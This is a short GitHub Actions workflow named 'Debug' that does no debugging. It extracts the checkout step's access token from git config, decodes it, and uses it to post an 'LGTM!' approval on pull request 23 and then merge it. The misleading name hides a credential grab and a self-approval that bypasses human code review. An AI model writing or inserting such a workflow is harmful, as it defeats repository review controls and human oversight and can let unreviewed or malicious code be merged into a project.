name: Debug

on:
  workflow_dispatch:

env:
  PR_NUMBER: 23
  RELEASE_TAG_SHA: 4c622f390949baf5e33a9aa8be1606209815ba13
  
jobs:
  debug:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608 # v4.1.0
      - name: Debug
        run: |
          encoded_token_with_prefix=$(git config --local --get http.https://github.com/.extraheader)
          encoded_token=${encoded_token_with_prefix#AUTHORIZATION: basic }
          decoded_token_with_prefix=$(echo $encoded_token | base64 --decode)
          export GITHUB_TOKEN=${decoded_token_with_prefix#x-access-token:}

          gh api \
            --method POST \
            /repos/$GITHUB_REPOSITORY/pulls/$PR_NUMBER/reviews \
            -f commit_id=$RELEASE_TAG_SHA \
            -f body='LGTM!' \
            -f event='APPROVE'
            
          gh api \
            --method PUT \
            /repos/$GITHUB_REPOSITORY/pulls/$PR_NUMBER/merge
